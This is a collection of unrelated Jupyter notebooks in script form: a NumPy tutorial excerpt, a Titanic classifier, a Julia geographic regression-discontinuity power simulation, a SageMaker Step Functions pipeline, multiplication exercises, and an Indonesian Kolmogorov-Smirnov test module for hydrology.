a = np.array([[4, 3, 5], [1, 2, 1]])
b = np.sort(a, axis=1)
b
# **Important**: Note that the code above sorts each row separately!
# In-place sort:
a.sort(axis=1)
a
# Sorting with fancy indexing:
a = np.array([4, 3, 1, 2])
j = np.argsort(a)
j
a[j]
# Finding minima and maxima:
a = np.array([4, 3, 1, 2])
j_max = np.argmax(a)
j_min = np.argmin(a)
j_max, j_min
# # `npy` - NumPy's own data format
#
# NumPy has its own binary format, not portable but with efficient I/O:
data = np.ones((3, 3))
np.save('pop.npy', data)
data3 = np.load('pop.npy')
# # Summary - What do you need to know to get started?
#
# * Know how to create arrays : ``array``, ``arange``, ``ones``, ``zeros``.
# * Know the shape of the array with ``array.shape``, then use slicing to obtain different views of the array: ``array[::2]``, etc. Adjust the shape of the array using ``reshape`` or flatten it with ``ravel``.
# * Obtain a subset of the elements of an array and/or modify their values with masks
# ``a[a < 0] = 0``
# * Know miscellaneous operations on arrays, such as finding the mean or max (``array.max()``, ``array.mean()``).
# * For advanced use: master the indexing with arrays of integers, as well as broadcasting.
| notebooks/.ipynb_checkpoints/python_numpy-checkpoint.ipynb |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
import seaborn as sns
df = pd.read_csv('train.csv')
df1 = pd.read_csv('test.csv')
df.head()
df1.head()
# +
dfy = df.Survived
df.drop(['PassengerId','Survived','Name','Ticket','Cabin'],axis=1,inplace=True)
df1.drop(['PassengerId','Name','Ticket','Cabin'],axis=1,inplace=True)
# -
df.head()
df1.head()
print('shape of training set : ',df.shape)
print('shape of testing set : ',df1.shape)
df.info()
df1.info()
df.describe()
df1.describe()
# +
column_df = df.columns
for x in column_df:
print('unique value information : ',x)
# print(df[x].unique())
print('number of unique value : ',df[x].unique().shape[0])
print('number of null (True if value is NaN) : \n',df[x].isnull().value_counts())
print('\n','-------------------------------------------------------------------------------','\n')
# +
column_df1 = df1.columns
for x in column_df1:
print('unique value information : ',x)
# print(df1[x].unique())
print('number of unique value : ',df1[x].unique().shape[0])
print('number of null (True if value is NaN) : \n',df1[x].isnull().value_counts())
print('\n','-------------------------------------------------------------------------------','\n')
# -
# #
#
#
#
#
# ### Replace NaN value with mean value
# #### Age in df and df1
df.Age.isnull().value_counts()
df.Age.fillna(df.Age.mean(),inplace=True)
df.Age.isnull().value_counts()
df1.Age.isnull().value_counts()
df1.Age.fillna(df1.Age.mean(),inplace=True)
df1.Age.isnull().value_counts()
# #### Embarked in df has 2 missing valued , replace it by mode of that column
df.Embarked.isnull().value_counts()
df.Embarked.value_counts()
df.Embarked.fillna('S',inplace=True)
df.Embarked.isnull().value_counts()
# #### Fare in df1 has 1 missing valued , replace it by mean of that column
df1.Fare.isnull().value_counts()
df1.Fare.fillna(df1.Fare.mean(),inplace=True)
df1.Fare.isnull().value_counts()
df.info()
df1.info()
# #### missing value problem solved!!
# ### labeling of column which contain catagorical data in object data type ('Sex' and 'Embarked')
from sklearn.preprocessing import LabelEncoder
# +
le = LabelEncoder()
le.fit(df.Sex)
Sex_labeled = le.transform(df.Sex)
df['Sex_labeled'] = Sex_labeled
df.drop(['Sex'],axis=1,inplace=True)
le.fit(df1.Sex)
Sex_labeled = le.transform(df1.Sex)
df1['Sex_labeled'] = Sex_labeled
df1.drop(['Sex'],axis=1,inplace=True)
le.fit(df.Embarked)
Embarked_labeled = le.transform(df.Embarked)
df['Embarked_labeled'] = Embarked_labeled
df.drop(['Embarked'],axis=1,inplace=True)
le.fit(df1.Embarked)
Embarked_labeled = le.transform(df1.Embarked)
df1['Embarked_labeled'] = Embarked_labeled
df1.drop(['Embarked'],axis=1,inplace=True)
# -
df.head()
df1.head()
df.info()
df1.info()
# #
#
#
#
# ## Train test split of df
from sklearn.model_selection import train_test_split as tts
x_train, x_test, y_train, y_test = tts(df,dfy,test_size = 0.25)
print('shape of train and test set : ')
print('x_train : ',x_train.shape)
print('x_test : ',x_test.shape)
print('y_train : ',y_train.shape)
print('y_test : ',y_test.shape)
# #
#
#
#
# ## Random Forest model
from sklearn.ensemble import RandomForestClassifier as RFC
from sklearn.metrics import roc_auc_score
model_rfc = RFC(max_depth=20,n_estimators=100,random_state=42)
model_rfc.fit(df,dfy)
model_rfc.score(df,dfy)
# +
y_pred = model_rfc.predict(df1)
#roc_auc_score(y_test,y_pred)
# -
# #
#
#
#
# ## SVM classifier
# +
from sklearn.preprocessing import StandardScaler
scaler = StandardScaler()
scaler.fit(df)
df = scaler.transform(df)
scaler.fit(x_test)
x_test = scaler.transform(x_test)
scaler.fit(df1)
df1 = scaler.transform(df1)
# -
from sklearn.svm import SVC
model_svm = SVC(C=10)
model_svm.fit(df,dfy)
model_svm.score(df,dfy)
# +
y_pred = model_svm.predict(df1)
#roc_auc_score(y_test,y_pred)
# -
# #
#
#
#
# ## creat submission file
Survived = y_pred
PassengerId = np.arange(892,1310)
ans = pd.DataFrame(list(zip(PassengerId,Survived)),columns=['PassengerId','Survived'])
ans.head()
ans.to_csv('ans.csv',index=False)
| Titanic machine learning problem.ipynb |
# -*- coding: utf-8 -*-
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .jl
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Julia 0.6.2 Experimental
# language: julia
# name: julia-0.6-experimental
# ---
# $$
# \newcommand{\genericdel}[3]{%
# \left#1#3\right#2
# }
# \newcommand{\del}[1]{\genericdel(){#1}}
# \newcommand{\sbr}[1]{\genericdel[]{#1}}
# \newcommand{\cbr}[1]{\genericdel\{\}{#1}}
# \newcommand{\abs}[1]{\genericdel||{#1}}
# \DeclareMathOperator*{\argmin}{arg\,min}
# \DeclareMathOperator*{\argmax}{arg\,max}
# \DeclareMathOperator{\Pr}{\mathbb{p}}
# \DeclareMathOperator{\E}{\mathbb{E}}
# \DeclareMathOperator{\Ind}{\mathbb{I}}
# \DeclareMathOperator{\V}{\mathbb{V}}
# \DeclareMathOperator{\cov}{Cov}
# \DeclareMathOperator{\var}{Var}
# \DeclareMathOperator{\ones}{\mathbf{1}}
# \DeclareMathOperator{\invchi}{\mathrm{Inv-\chi}^2}
# \DeclareMathOperator*{\argmin}{arg\,min}
# \DeclareMathOperator*{\argmax}{arg\,max}
# \newcommand{\effect}{\mathrm{eff}}
# \newcommand{\xtilde}{\widetilde{X}}
# \DeclareMathOperator{\normal}{\mathcal{N}}
# \DeclareMathOperator{\unif}{Uniform}
# \newcommand{\boxleft}{\unicode{x25E7}}
# \newcommand{\boxright}{\unicode{x25E8}}
# \newcommand{\discont}{\unicode{x25EB}}
# \newcommand{\jleft}{\unicode{x21E5}}
# \newcommand{\jright}{\unicode{x21E4}}
# \DeclareMathOperator*{\gp}{\mathcal{GP}}
# \newcommand{\trans}{^{\intercal}}
# \newcommand{\scrS}{\mathscr{S}}
# \newcommand{\sigmaf}{\sigma_{\mathrm{GP}}}
# \newcommand{\sigman}{\sigma_{\epsilon}}
# \newcommand{\sigmatau}{\sigma_{\tau}}
# \newcommand{\sigmabeta}{\sigma_{\beta}}
# \newcommand{\sigmamu}{\sigma_{\mu}}
# \newcommand{\sigmagamma}{\sigma_{\gamma}}
# \newcommand{\svec}{\mathbf{s}}
# \newcommand{\yvec}{\mathbf{y}}
# \newcommand{\muvec}{\mathbf{\mu}}
# \newcommand{\indep}{\perp}
# \newcommand{\iid}{iid}
# \newcommand{\vectreat}{\Ind_{T}}
# \newcommand{\yt}{Y^\mathrm{T}}
# \newcommand{\yc}{Y^\mathrm{C}}
# \newcommand{\boundary}{\partial}
# \newcommand{\sentinels}{\mathbf{\boundary}}
# \newcommand{\eye}{\mathbf{I}}
# \newcommand{\K}{\mathbf{K}}
# \DeclareMathOperator{\trace}{trace}
# \newcommand{\linavg}{\bar{\tau}}
# \newcommand{\invvar}{\tau^{IV}}
# \newcommand{\modnull}{\mathscr{M}_0}
# \newcommand{\modalt}{\mathscr{M}_1}
# \newcommand{\degree}{\hspace{0pt}^\circ}
# $$
do_savefig = false
figures_dir = "insert/path/where/figures/should/be/saved/"
;
using LaTeXStrings
using GaussianProcesses
using Distributions
using Base.LinAlg
using Distances
import PyPlot; plt=PyPlot
plt.rc("figure", dpi=300.0)
# plt.rc("figure", figsize=(6,4))
plt.rc("figure", autolayout=true)
plt.rc("savefig", dpi=300.0)
plt.rc("text", usetex=true)
plt.rc("font", family="serif")
plt.rc("font", serif="Palatino")
;
using GeoRDD
# # Experiment
X_LA = readcsv("Mississippi_data/X_LA.csv")
X_MS = readcsv("Mississippi_data/X_MS.csv")
border_XY = readcsv("Mississippi_data/border.csv")
border = LibGEOS.LineString([border_XY[i,:] for i in 1:size(border_XY,1)])
sentinels = GeoRDD.sentinels(border, 200)
;
n_MS = size(X_MS, 2)
n_LA = size(X_LA, 2)
Y_MS = zeros(n_MS)
Y_LA = zeros(n_LA)
;
k = SEIso(log(100e3), 0.0)
k2 = k + Const(log(100.0))
gp_MS = GP(X_MS, Y_MS, MeanZero(), k2, 0.0)
gp_LA = GP(X_LA, Y_LA, MeanZero(), k2, 0.0)
;
srand(4)
τ = 1.2
gpNull = GeoRDD.make_null(gp_MS, gp_LA)
Ysim = GeoRDD.prior_rand(gpNull)
Ysim .-= mean(Ysim)
Ysim[1:gp_MS.nobsv] .+= τ
Ysim_MS = Ysim[1:gp_MS.nobsv]
Ysim_LA = Ysim[gp_MS.nobsv+1:end]
minY = minimum(Ysim)
maxY = maximum(Ysim)
gp_MS.y = Ysim_MS
gp_LA.y = Ysim_LA
GeoRDD.update_mll!(gp_MS)
GeoRDD.update_mll!(gp_LA)
;
GeoRDD.pval_invvar_calib(gp_MS, gp_LA, sentinels)
@time GeoRDD.boot_chi2test(gp_MS, gp_LA, sentinels, 10000)
@time GeoRDD.boot_chi2test(gp_MS, gp_LA, sentinels, 10000)
@time GeoRDD.boot_mlltest(gp_MS, gp_LA, 10000)
# ## Plot outcomes
using PyCall
@pyimport mpl_toolkits.axes_grid1.anchored_artists as anchored_artists
cbbPalette = ["#E69F00", "#56B4E9", "#009E73", "#F0E442", "#0072B2", "#D55E00", "#CC79A7"]
plt.gcf()[:set_size_inches](10.0, 5.0)
plt.subplot(1,2,1)
scale=10
# s=scale*(Ysim_LA-minY)+1
plt.scatter(X_LA[1,:], X_LA[2,:], marker="o", c=Ysim_LA, vmin=-1, vmax=3, s=100)
ax = plt.gca()
ax[:axis]("off")
ax[:axes][:set_aspect]("equal", "datalim")
plt.plot(border_XY[:,1], border_XY[:,2], color="black")
plt.scatter(X_MS[1,:], X_MS[2,:], marker="o", c=Ysim_MS, vmin=-1, vmax=3, s=100)
sizebar = anchored_artists.AnchoredSizeBar(ax[:transData], 100*1000, "100 km", 2; frameon=false)
ax[:add_artist](sizebar)
plt.colorbar()
if do_savefig
plt.savefig(joinpath(figures_dir, "mississippi_sim.png"), bbox_inches="tight")
plt.savefig(joinpath(figures_dir, "mississippi_sim.pdf"), bbox_inches="tight")
end
;
srand(1)
@time p_invvar_sims = GeoRDD.nsim_invvar_pval(gp_MS, gp_LA, sentinels, 100000);
# +
@time mLL_sims = let
gpT = gp_MS
gpC = gp_LA
gpNull = GeoRDD.make_null(gpT, gpC)
GeoRDD.nsim_logP(gp_MS, gp_LA, gpNull, 100_000)
end
mLL_sim_null = [sim[1] for sim in mLL_sims]
mLL_sim_altv = [sim[2] for sim in mLL_sims]
;
# -
@time chi_sims_μ = let
gpT = gp_MS
gpC = gp_LA
# yNull = [gpT.y; gpC.y]
# xNull = [gpT.X gpC.X]
# kNull = gpT.k
# mNull = gpT.m
gpNull = GeoRDD.make_null(gpT, gpC)
GeoRDD.nsim_chi(gp_MS, gp_LA, gpNull, sentinels, 100_000)
end
;
# # Power
τ=1.2
srand(1)
@time power_sims = GeoRDD.nsim_power(gp_MS, gp_LA, τ, sentinels,
chi_sims_μ, mLL_sim_altv.-mLL_sim_null, p_invvar_sims,
10000
);
τ=0.0
srand(1)
@time power_sims_null = GeoRDD.nsim_power(gp_MS, gp_LA, τ, sentinels,
chi_sims_μ, mLL_sim_altv.-mLL_sim_null, p_invvar_sims,
10000
);
# ## plot power
# +
cbbPalette = ["#E69F00", "#56B4E9", "#009E73", "#F0E442", "#0072B2", "#D55E00", "#CC79A7"]
bins=linspace(0,1.1,1000)
plt.figure(figsize=(10,5))
plt.subplot(1,2,1)
plt.plot([0.0,1.0],[0.0,1.0], color="#222222", linewidth=2)
plt.plot(sort([s[1] for s in power_sims_null]),
linspace(0,1,length(power_sims_null)),
color=cbbPalette[1],
label="mLL",
linewidth=2,
)
plt.plot(sort([s[2] for s in power_sims_null]),
linspace(0,1,length(power_sims_null)),
color=cbbPalette[2],
label=L"\chi^2",
linewidth=2,
)
plt.plot(sort([s[3] for s in power_sims_null]),
linspace(0,1,length(power_sims_null)),
color=cbbPalette[3],
label=L"$\Sigma^{-1}$-weighted",
linewidth=2,
)
# bootstrap calibration
# plt.plot(sort([s[5] for s in power_sims_null]),
# linspace(0,1,length(power_sims_null)),
# color=cbbPalette[3],
# linestyle=":",
# label=L"$\Sigma^{-1}$-weighted calibrated",
# linewidth=2,
# )
plt.plot(sort([s[5] for s in power_sims_null]),
linspace(0,1,length(power_sims_null)),
color=cbbPalette[3],
linestyle=":",
label=L"$\Sigma^{-1}$-weighted calibrated",
linewidth=2,
)
plt.xlabel(L"Significance level $\alpha$")
plt.ylabel("Power")
plt.legend(loc="lower right", fontsize="small")
plt.title(L"Power under $\tau=0$")
plt.xlim(0,0.3)
plt.ylim(0,0.3)
plt.subplot(1,2,2)
plt.plot([0.0,1.0],[0.0,1.0], color="#222222", linewidth=2)
plt.plot(sort([s[1] for s in power_sims]),
linspace(0,1,length(power_sims)),
color=cbbPalette[1],
label="mLL",
linewidth=2,
)
plt.plot(sort([s[2] for s in power_sims]),
linspace(0,1,length(power_sims)),
color=cbbPalette[2],
label=L"\chi^2",
linewidth=2,
)
plt.plot(sort([s[3] for s in power_sims]),
linspace(0,1,length(power_sims)),
color=cbbPalette[3],
label=L"$\Sigma^{-1}$-weighted",
linewidth=2,
)
# bootstrap calibration
# plt.plot(sort([s[5] for s in power_sims]),
# linspace(0,1,length(power_sims)),
# color=cbbPalette[3],
# linestyle=":",
# label=L"$\Sigma^{-1}$-weighted calibrated",
# linewidth=2,
# )
plt.plot(sort([s[5] for s in power_sims]),
linspace(0,1,length(power_sims)),
color=cbbPalette[3],
linestyle=":",
label=L"$\Sigma^{-1}$-weighted calibrated",
linewidth=2,
)
plt.xlabel(L"Significance level $\alpha$")
plt.ylabel("Power")
plt.title(@sprintf("Power under \$\\tau\$=%.1f", τ))
plt.xlim(0,0.3)
plt.ylim(0,1.0)
;
# -
# ## generate table
import DataFrames
power_df = DataFrames.DataFrame()
power_df[:estimator] = LaTeXString.([
"Marginal log-likelihood bootstrap",
raw"\(\chi^2\) bootstrap",
raw"\(\invvar\) uncalibrated",
raw"\(\invvar\) bootstrap calibrated",
raw"\(\invvar\) analytically calibrated"]
)
α = 0.05
pval_fmt(pvals, α) = @sprintf("%.2f", mean(p < α for p in pvals))
power_df[:null] = [pval_fmt((ps[i] for ps in power_sims_null), α) for i in 1:5]
power_df[:altv] = [pval_fmt((ps[i] for ps in power_sims), α) for i in 1:5]
power_df
print(reprmime("text/latex", power_df))
| notebooks/Mississippi_sharp_null_sims.ipynb |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: conda_python3
# language: python
# name: conda_python3
# ---
# + language="sh"
# pip -q install sagemaker stepfunctions --upgrade
# -
# Enter your role ARN
workflow_execution_role =
# +
import boto3
import sagemaker
import stepfunctions
from stepfunctions import steps
from stepfunctions.steps import TrainingStep, ModelStep, EndpointConfigStep, EndpointStep, TransformStep, Chain
from stepfunctions.steps.states import Parallel
from stepfunctions.inputs import ExecutionInput
from stepfunctions.workflow import Workflow
# +
sess = sagemaker.Session()
bucket = sess.default_bucket()
role = sagemaker.get_execution_role()
prefix = 'sklearn-boston-housing-stepfunc'
training_data = sess.upload_data(path='housing.csv', key_prefix=prefix + "/training")
output = 's3://{}/{}/output/'.format(bucket,prefix)
print(training_data)
print(output)
# +
import pandas as pd
data = pd.read_csv('housing.csv')
data.drop(['medv'], axis=1, inplace=True)
data.to_csv('test.csv', index=False, header=False)
batch_data = sess.upload_data(path='test.csv', key_prefix=prefix + "/batch")
# +
from sagemaker.sklearn import SKLearn
sk = SKLearn(entry_point='sklearn-boston-housing.py',
role=role,
framework_version='0.20.0',
instance_count=1,
instance_type='ml.m5.large',
output_path=output,
hyperparameters={
'normalize': True,
'test-size': 0.1
}
)
# -
execution_input = ExecutionInput(schema={
'JobName': str,
'ModelName': str,
'EndpointName': str
})
training_step = TrainingStep(
'Train a Scikit-Learn script on the Boston Housing dataset',
estimator=sk,
data={'training': sagemaker.s3_input(training_data, content_type='text/csv')},
job_name=execution_input['JobName']
)
model_step = ModelStep(
'Create the model in SageMaker',
model=training_step.get_expected_model(),
model_name=execution_input['ModelName']
)
transform_step = TransformStep(
'Transform the dataset in batch mode',
transformer=sk.transformer(instance_count=1, instance_type='ml.m5.large'),
job_name=execution_input['JobName'],
model_name=execution_input['ModelName'],
data=batch_data,
content_type='text/csv'
)
batch_branch = Chain([
transform_step
])
endpoint_config_step = EndpointConfigStep(
"Create an endpoint configuration for the model",
endpoint_config_name=execution_input['ModelName'],
model_name=execution_input['ModelName'],
initial_instance_count=1,
instance_type='ml.m5.large'
)
endpoint_step = EndpointStep(
"Create an endpoint hosting the model",
endpoint_name=execution_input['EndpointName'],
endpoint_config_name=execution_input['ModelName']
)
endpoint_branch = Chain([
endpoint_config_step,
endpoint_step
])
# +
parallel_step = Parallel(
'Parallel execution'
)
parallel_step.add_branch(batch_branch)
parallel_step.add_branch(endpoint_branch)
# -
workflow_definition = Chain([
training_step,
model_step,
parallel_step
])
# +
import time
timestamp = time.strftime("%Y-%m-%d-%H-%M-%S", time.gmtime())
workflow = Workflow(
name='sklearn-boston-housing-workflow2-{}'.format(timestamp),
definition=workflow_definition,
role=workflow_execution_role,
execution_input=execution_input
)
# -
workflow.render_graph(portrait=True)
workflow.create()
execution = workflow.execute(
inputs={
'JobName': 'sklearn-boston-housing-{}'.format(timestamp),
'ModelName': 'sklearn-boston-housing-{}'.format(timestamp),
'EndpointName': 'sklearn-boston-housing-{}'.format(timestamp)
}
)
execution.render_progress()
execution.list_events(html=True)
workflow.list_executions(html=True)
Workflow.list_workflows(html=True)
# ---
| sdkv2/ch12/step_functions/Scikit-Learn on Boston Housing - v2.ipynb |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# + [markdown] deletable=true editable=true
# Ex1.
# + deletable=true editable=true
for j in range(1,4):
for k in range(1,6):
print(j,k,j*k)
print()
# + [markdown] deletable=true editable=true
# Ex2. Sol1.
# + deletable=true editable=true
for i in range(1,10):
lst=[]
for j in range(1,10):
lst.append(i*j)
print(lst)
# + [markdown] deletable=true editable=true
# Ex2. Sol2.
# + deletable=true editable=true
for i in range(1,10):
lst=[i*j for j in list(range(1,10))]
print(lst)
# + [markdown] deletable=true editable=true
# Ex2. Sol3.
# + deletable=true editable=true
lst=list(range(1,10))
for k in range(1,10):
print(list(map( (lambda x:k*x) ,lst)))
# + [markdown] deletable=true editable=true
# Ex2. Sol4.
# + deletable=true editable=true
import numpy as np
for j in range(1,10):
print(j*np.linspace(1,9,9))
# + deletable=true editable=true
| exercises/.ipynb_checkpoints/solution-checkpoint.ipynb |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# name: python3
# ---
# + [markdown] id="vTbvS7mlWHT_"
# Berdasarkan isu [#140](https://github.com/hidrokit/hidrokit/issues/140): **Uji Kolmogorov-Smirnov**
#
# Referensi Isu:
# - <NAME>., <NAME>., Press, U. B., & Media, U. (2017). Rekayasa Statistika untuk Teknik Pengairan. Universitas Brawijaya Press. https://books.google.co.id/books?id=TzVTDwAAQBAJ
# - Soewarno. (1995). hidrologi: Aplikasi Metode Statistik untuk Analisa Data. NOVA.
# - <NAME>. (2018). Rekayasa Hidrologi.
#
# Deskripsi Isu:
# - Melakukan Uji Kecocokan Distribusi menggunakan Uji Kolmogorov-Smirnov.
#
# Strategi:
# - Membuat fungsi _inverse_ atau CDF untuk masing-masing distribusi yang digunakan. (sudah diselesaikan pada isu [#179](https://github.com/hidrokit/hidrokit/issues/179))
# - Tidak dibandingkan dengan fungsi `scipy.stats.kstest`.
# + [markdown] id="wKVU8TNyWYCw"
# # PERSIAPAN DAN DATASET
# + id="ADlBvxJ1SC5O"
try:
import hidrokit
except ModuleNotFoundError:
# saat dibuat menggunakan cabang @dev/dev0.3.7
# !pip install git+https://github.com/taruma/hidrokit.git@dev/dev0.3.7 -q
# + id="BF91rLR2V2xt"
import numpy as np
import pandas as pd
from scipy import stats
from hidrokit.contrib.taruma import hk172, hk124, hk127, hk126
frek_normal, frek_lognormal, frek_gumbel, frek_logpearson3 = hk172, hk124, hk127, hk126
# + colab={"base_uri": "https://localhost:8080/", "height": 394} id="jfL0hzvtqfem" outputId="045d43c7-b740-44cf-ee9c-82ca6c8c95fb"
# contoh data diambil dari buku
# limantara hal. 114
_HUJAN = np.array([85, 92, 115, 116, 122, 52, 69, 95, 96, 105])
_TAHUN = np.arange(1998, 2008) # 1998-2007
data = pd.DataFrame(
data=np.stack([_TAHUN, _HUJAN], axis=1),
columns=['tahun', 'hujan']
)
data.tahun = pd.to_datetime(data.tahun, format='%Y')
data.set_index('tahun', inplace=True)
data
# + [markdown] id="pn3l9uqhlwOs"
# # TABEL
#
# Terdapat 2 tabel untuk modul `hk140` yaitu:
# - `t_dcr_st`: Tabel nilai kritis (Dcr) Untuk Uji Kolmogorov-Smirnov dari buku _Rekayasa Statistika untuk Teknik Pengairan_ oleh Soetopo.
# - `t_dcr_sw`: Tabel nilai kritis Do Untuk Uji Smirnov-Kolmogorov dari buku _hidrologi: Aplikasi Metode Statistik untuk Analisa Data_ oleh Soewarno.
#
# Dalam modul `hk126` nilai $\Delta_{kritis}$ akan dibangkitkan menggunakan fungsi `scipy.stats.ksone.ppf` secara `default`. Mohon diperhatikan jika ingin menggunakan nilai $\Delta_{kritis}$ yang berasal dari sumber lain.
# + colab={"base_uri": "https://localhost:8080/", "height": 677} id="bYkR_ZhZU9um" outputId="0d697df4-a933-4b0a-b084-d341c1db0bff"
# tabel dari soetopo hal. 139
# Tabel Nilai Kritis (Dcr) Untuk Uji Kolmogorov-Smirnov
# KODE: ST
_DATA_ST = [
[0.900, 0.925, 0.950, 0.975, 0.995],
[0.684, 0.726, 0.776, 0.842, 0.929],
[0.565, 0.597, 0.642, 0.708, 0.829],
[0.494, 0.525, 0.564, 0.624, 0.734],
[0.446, 0.474, 0.510, 0.563, 0.669],
[0.410, 0.436, 0.470, 0.521, 0.618],
[0.381, 0.405, 0.438, 0.486, 0.577],
[0.358, 0.381, 0.411, 0.457, 0.543],
[0.339, 0.360, 0.388, 0.432, 0.514],
[0.322, 0.342, 0.368, 0.409, 0.486],
[0.307, 0.326, 0.352, 0.391, 0.468],
[0.295, 0.313, 0.338, 0.375, 0.450],
[0.284, 0.302, 0.325, 0.361, 0.433],
[0.274, 0.292, 0.314, 0.349, 0.418],
[0.266, 0.283, 0.304, 0.338, 0.404],
[0.258, 0.274, 0.295, 0.328, 0.391],
[0.250, 0.266, 0.286, 0.318, 0.380],
[0.244, 0.259, 0.278, 0.309, 0.370],
[0.237, 0.252, 0.272, 0.301, 0.361],
[0.231, 0.246, 0.264, 0.294, 0.352],
]
_INDEX_ST = range(1, 21)
_COL_ST = [0.2, 0.15, 0.1, 0.05, 0.01]
t_dcr_st = pd.DataFrame(
data=_DATA_ST, index=_INDEX_ST, columns=_COL_ST
)
t_dcr_st
# + colab={"base_uri": "https://localhost:8080/", "height": 363} id="XuNz6_5dmRxr" outputId="608a622f-8757-48e3-e73f-b9a8ff8d473b"
# tabel dari soewarno hal. 139
# Tabel Nilai Kritis (Dcr) Untuk Uji Kolmogorov-Smirnov
# KODE: SW
_DATA_SW = [
[0.45, 0.51, 0.56, 0.67],
[0.32, 0.37, 0.41, 0.49],
[0.27, 0.3 , 0.34, 0.4 ],
[0.23, 0.26, 0.29, 0.35],
[0.21, 0.24, 0.26, 0.32],
[0.19, 0.22, 0.24, 0.29],
[0.18, 0.2 , 0.22, 0.27],
[0.17, 0.19, 0.21, 0.25],
[0.16, 0.18, 0.2 , 0.24],
[0.15, 0.17, 0.19, 0.23]
]
_INDEX_SW = range(5, 51, 5)
_COL_SW = [0.2, 0.1, 0.05, 0.01]
t_dcr_sw = pd.DataFrame(
data=_DATA_SW, index=_INDEX_SW, columns=_COL_SW
)
t_dcr_sw
# + [markdown] id="6idc0EuZYb_B"
# # KODE
# + id="LEj79zOznHKJ"
# KODE FUNGSI INTERPOLASI DARI TABEL
from scipy import interpolate
def _func_interp_bivariate(df):
"Membuat fungsi dari tabel untuk interpolasi bilinear"
table = df[df.columns.sort_values()].sort_index().copy()
x = table.index
y = table.columns
z = table.to_numpy()
# penggunaan kx=1, ky=1 untuk interpolasi linear antara 2 titik
# tidak menggunakan (cubic) spline interpolation
return interpolate.RectBivariateSpline(x, y, z, kx=1, ky=1)
def _as_value(x, dec=4):
x = np.around(x, dec)
return x.flatten() if x.size > 1 else x.item()
def _calc_k(x):
return (x - x.mean()) / x.std()
# + id="i7yYxte8nkCB"
table_source = {
'soewarno': t_dcr_sw,
'soetopo': t_dcr_st
}
anfrek = {
'normal': frek_normal,
'lognormal': frek_lognormal,
'gumbel': frek_gumbel,
'logpearson3': frek_logpearson3
}
def calc_dcr(alpha, n, source='scipy'):
alpha = np.array(alpha)
if source.lower() == 'scipy':
# ref: https://stackoverflow.com/questions/53509986/
return stats.ksone.ppf(1-alpha/2, n)
elif source.lower() in table_source.keys():
func_table = _func_interp_bivariate(table_source[source.lower()])
# untuk soewarno 2 angka dibelakang koma, dan soetopo = 3
dec = (source.lower() == 'soetopo') + 2
return _as_value(func_table(n, alpha, grid=False), dec)
def kstest(
df, col=None, dist='normal', source_dist='scipy',
alpha=0.05, source_dcr='scipy', show_stat=True, report='result'
):
source_dist = 'gumbel' if dist.lower() == 'gumbel' else source_dist
col = df.columns[0] if col is None else col
data = df[[col]].copy()
n = len(data)
data = data.rename({col: 'x'}, axis=1)
data = data.sort_values('x')
data['no'] = np.arange(n) + 1
# w = weibull
data['p_w'] = data.no / (n+1)
if dist.lower() in ['normal', 'gumbel']:
data['k'] = _calc_k(data.x)
if dist.lower() in ['lognormal', 'logpearson3']:
data['log_x'] = np.log10(data.x)
data['k'] = _calc_k(data.log_x)
func = anfrek[dist.lower()]
if dist.lower() in ['normal', 'lognormal']:
parameter = ()
elif dist.lower() == 'gumbel':
parameter = (n,)
elif dist.lower() == 'logpearson3':
parameter = (data.log_x.skew(),)
# d = distribusi
data['p_d'] = func.calc_prob(data.k, source=source_dist, *parameter)
data['d'] = (data.p_w - data.p_d).abs()
dmax = data.d.max()
dcr = calc_dcr(alpha, n, source=source_dcr)
result = int(dmax < dcr)
result_text = ['Distribusi Tidak Diterima', 'Distribusi Diterima']
if show_stat:
print(f'Periksa Kecocokan Distribusi {dist.title()}')
print(f'Delta Kritikal = {dcr:.5f}')
print(f'Delta Max = {dmax:.5f}')
print(f'Result (Dmax < Dcr) = {result_text[result]}')
if report.lower() == 'result':
return data['no x p_w p_d d'.split()]
elif report.lower() == 'full':
return data
# + [markdown] id="j9zfA3woZJHh"
# # FUNGSI
# + [markdown] id="3QMJTVF4ZKQx"
# ## Fungsi `calc_dcr(alpha, n, ...)`
#
# Function: `calc_dcr(alpha, n, source='scipy')`
#
# Fungsi `calc_dcr(...)` digunakan untuk mencari nilai Delta kritis (Dcr / $\Delta_{kritis}$) dari berbagai sumber berdasarkan nilai derajat kepercayaan (_level of significance_) $\alpha$ dan jumlah banyaknya data $n$.
#
# - Argumen Posisi:
# - `alpha`: Nilai _level of significance_ $\alpha$. Dalam satuan desimal ($\left(0,1\right) \in \mathbb{R}$).
# - `n`: Jumlah banyaknya data.
# - Argumen Opsional:
# - `source`: sumber nilai `Dcr`. `'scipy'` (default). Sumber yang dapat digunakan antara lain: Soetopo (`'soetopo'`), Soewarno (`'soewarno'`).
#
# Perlu dicatat bahwa batas nilai $\alpha$ dan $n$ untuk masing-masing tabel berbeda-beda.
# - Untuk `soetopo` batasan dimulai dari $\alpha = \left[0.2,0.01\right]$ dengan $n = \left[1,20\right]$
# - Untuk `soewarno` batasan dimulai dari $\alpha = \left[0.2,0.01\right]$ dengan $n = \left[5,50\right]$
#
# Untuk $n > 50$ disarankan menggunakan `scipy`.
# + colab={"base_uri": "https://localhost:8080/"} id="_CNKE6VffXtw" outputId="38f482f4-410b-4686-eaf7-2a2341cde98b"
calc_dcr(0.2, 10)
# + colab={"base_uri": "https://localhost:8080/"} id="RMXPAyD0fdae" outputId="5bda9bdc-3b54-41fb-d295-ffb81fd1137f"
calc_dcr(0.15, 10, source='soetopo')
# + colab={"base_uri": "https://localhost:8080/"} id="JJf9s5GTfqoz" outputId="7f5646b3-1e14-4a5b-e130-0b524864365a"
# perbandingan antara nilai tabel dan fungsi scipy
source_test = ['soewarno', 'soetopo', 'scipy']
_n = 10
